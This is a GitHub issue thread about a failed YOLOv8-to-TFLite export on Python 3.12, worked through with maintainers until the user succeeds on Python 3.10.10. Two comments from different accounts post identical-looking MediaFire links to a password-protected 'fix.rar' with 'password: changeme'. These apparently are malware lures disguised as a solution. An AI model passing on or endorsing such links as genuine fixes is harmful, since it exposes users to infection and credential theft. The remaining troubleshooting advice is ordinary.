### ISSUE TITLE
Conversion to TFLITE fails

### ISSUE THREAD

**Issue by zensardigital** [ultralytics/ultralytics#15823]
### Search before asking

- [X] I have searched the Ultralytics YOLO [issues](https://github.com/ultralytics/ultralytics/issues) and [discussions](https://github.com/ultralytics/ultralytics/discussions) and found no similar questions.

### Question

Ultralytics YOLOv8.2.68 🚀 Python-3.12.4 torch-2.3.1+cu118 CPU (AMD Ryzen 9 8945HS w/ Radeon 780M Graphics)
Model summary (fused): 218 layers, 25,840,339 parameters, 0 gradients, 78.7 GFLOPs

PyTorch: starting from 'runs\detect\train3\weights\best.pt' with input shape (1, 3, 640, 640) BCHW and output shape(s) (1, 5, 8400) (49.6 MB)
**requirements: Ultralytics requirements [**'tf_keras', 'tflite_support'**] not found, attempting AutoUpdate...

The update never happens**

It never updates....when i try installing these does not exists, found alternative ones, they do not work either.....found similar articles in GitHub, does not work even

Can you help me fix this....Please give priority to this one

**Comment by ritiiq** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Y-T-G** [comment]
Can you try this?

https://github.com/ultralytics/ultralytics/issues/14235#issuecomment-2211489301

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by zensardigital** [comment]
Thanks for your reply. I tried it and now i get

Ultralytics requirement ['tflite_support'] not found, attempting AutoUpdate...

etry 2/2 failed: Command 'pip install --no-cache-dir "tflite_support" --extra-index-url https://pypi.ngc.nvidia.com' returned non-zero exit status 1.
requirements: ❌ Command 'pip install --no-cache-dir "tflite_support" --extra-index-url https://pypi.ngc.nvidia.com' returned non-zero exit status 1.

TensorFlow SavedModel: starting export with tensorflow 2.16.1...
WARNING:tensorflow:From C:\Users\mshaf\PycharmProjects\hibiscus-yolov8\venv\Lib\site-packages\tf_keras\src\losses.py:2976: The name tf.losses.sparse_softmax_cross_entropy is deprecated. Please use tf.compat.v1.losses.sparse_softmax_cross_entropy instead.

Downloading https://github.com/ultralytics/assets/releases/download/v8.2.0/calibration_image_sample_data_20x128x128x3_float32.npy.zip to 'calibration_image_sample_data_20x128x128x3_float32.npy.zip'...
100%|██████████| 1.11M/1.11M [00:01<00:00, 674kB/s]
Unzipping calibration_image_sample_data_20x128x128x3_float32.npy.zip to C:\Users\mshaf\PycharmProjects\hibiscus-yolov8\calibration_image_sample_data_20x128x128x3_float32.npy...: 100%|██████████| 1/1 [00:00<00:00, 37.87file/s]

ONNX: starting export with onnx 1.16.2 opset 17...
ONNX: slimming with onnxslim 0.1.32...
ONNX: export success ✅ 5.0s, saved as 'runs\detect\train3\weights\best.onnx' (98.9 MB)
TensorFlow SavedModel: starting TFLite export with onnx2tf 1.22.3...

Process finished with exit code -1073741819 (0xC0000005)

**Comment by Y-T-G** [comment]
`tflite_support` is not available for Python 3.12.

You can try `pip install tflite-support --ignore-requires-python`

**Comment by zensardigital** [comment]
Hi

Tried it....installed VS Build Tools as well, but did not work

      error: Microsoft Visual C++ 14.0 or greater is required. Get it with "Microsoft C++ Build Tools": https://visualstudio.microsoft.com/visual-cpp-build-tools/    
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
  ERROR: Failed building wheel for tflite-support
  Running setup.py clean for tflite-support
Failed to build tflite-support

Created a separate PyCharm Project to build these....does not work

**Comment by Y-T-G** [comment]
You have to add the build tools to path first after installation.

https://github.com/bycloudai/InstallVSBuildToolsWindows

Then restart terminal and try pip install again.

**Comment by zensardigital** [comment]
Thanks....folllowed the instructions.... tflite-support got build up 

but when i run following export code it fails....

`from ultralytics import YOLO


if __name__ == "__main__":

    # Load a model
    model = YOLO(model="runs/detect/train3/weights/best.pt")

    model.export(format='tflite')`

yolov8\venv\Scripts\python.exe yolov8\yolov8-tflite-export.py 
Ultralytics YOLOv8.2.68 🚀 Python-3.12.4 torch-2.3.1+cu118 CPU (AMD Ryzen 9 8945HS w/ Radeon 780M Graphics)
Model summary (fused): 218 layers, 25,840,339 parameters, 0 gradients, 78.7 GFLOPs

PyTorch: starting from 'runs\detect\train3\weights\best.pt' with input shape (1, 3, 640, 640) BCHW and output shape(s) (1, 5, 8400) (49.6 MB)

TensorFlow SavedModel: starting export with tensorflow 2.16.1...
WARNING:tensorflow:From yolov8\venv\Lib\site-packages\tf_keras\src\losses.py:2976: The name tf.losses.sparse_softmax_cross_entropy is deprecated. Please use tf.compat.v1.losses.sparse_softmax_cross_entropy instead.


ONNX: starting export with onnx 1.16.2 opset 17...
ONNX: slimming with onnxslim 0.1.32...
ONNX: export success ✅ 2.7s, saved as 'runs\detect\train3\weights\best.onnx' (98.9 MB)
TensorFlow SavedModel: starting TFLite export with onnx2tf 1.22.3...
WARNING: All log messages before absl::InitializeLog() is called are written to STDERR
W0000 00:00:1724751830.378347   24324 tf_tfl_flatbuffer_helpers.cc:390] Ignored output_format.
W0000 00:00:1724751830.378465   24324 tf_tfl_flatbuffer_helpers.cc:393] Ignored drop_control_dependency.
W0000 00:00:1724751833.353668   24324 tf_tfl_flatbuffer_helpers.cc:390] Ignored output_format.
W0000 00:00:1724751833.353726   24324 tf_tfl_flatbuffer_helpers.cc:393] Ignored drop_control_dependency.
Traceback (most recent call last):
  File "yolov8\venv\Lib\site-packages\ultralytics\engine\exporter.py", line 1024, in _add_tflite_metadata
    from tensorflow_lite_support.metadata import metadata_schema_py_generated as schema  # noqa
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ModuleNotFoundError: No module named 'tensorflow_lite_support'

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "yolov8\yolov8-tflite-export.py", line 9, in <module>
    model.export(format='tflite')
  File "yolov8\venv\Lib\site-packages\ultralytics\engine\model.py", line 743, in export
    return Exporter(overrides=args, _callbacks=self.callbacks)(model=self.model)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "yolov8\venv\Lib\site-packages\torch\utils\_contextlib.py", line 115, in decorate_context
    return func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "yolov8\venv\Lib\site-packages\ultralytics\engine\exporter.py", line 313, in __call__
    f[5], keras_model = self.export_saved_model()
                        ^^^^^^^^^^^^^^^^^^^^^^^^^
  File "yolov8\venv\Lib\site-packages\ultralytics\engine\exporter.py", line 142, in outer_func
    raise e
  File "yolov8\venv\Lib\site-packages\ultralytics\engine\exporter.py", line 137, in outer_func
    f, model = inner_func(*args, **kwargs)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "yolov8\venv\Lib\site-packages\ultralytics\engine\exporter.py", line 903, in export_saved_model
    f.unlink() if "quant_with_int16_act.tflite" in str(f) else self._add_tflite_metadata(file)
                                                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "yolov8\venv\Lib\site-packages\ultralytics\engine\exporter.py", line 1027, in _add_tflite_metadata
    from tflite_support import metadata  # noqa
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "yolov8\venv\Lib\site-packages\tflite_support\metadata.py", line 28, in <module>
    from tflite_support import flatbuffers
  File "yolov8\venv\Lib\site-packages\tflite_support\flatbuffers\__init__.py", line 15, in <module>
    from .builder import Builder
  File "yolov8\venv\Lib\site-packages\tflite_support\flatbuffers\builder.py", line 15, in <module>
    from . import number_types as N
  File "yolov8\venv\Lib\site-packages\tflite_support\flatbuffers\number_types.py", line 18, in <module>
    from . import packer
  File "yolov8\venv\Lib\site-packages\tflite_support\flatbuffers\packer.py", line 22, in <module>
    from . import compat
  File "yolov8\venv\Lib\site-packages\tflite_support\flatbuffers\compat.py", line 19, in <module>
    import imp
ModuleNotFoundError: No module named 'imp'
TensorFlow SavedModel: export failure ❌ 33.4s: No module named 'imp'

**Comment by zensardigital** [comment]
Or can you give me which version of Python should i use ....

I will redo the entire thing in lower version of python

**Comment by zensardigital** [comment]
No issues were faced while using 3.10.10 but its bit slower....I was able to generate TFLITE file with FLOAT32 and FLOAT16

**Comment by zensardigital** [comment]
Closing this issue

**Comment by glenn-jocher** [comment]
Glad to hear you resolved the issue with Python 3.10.10. If you encounter any further problems, feel free to open a new issue. Thank you!
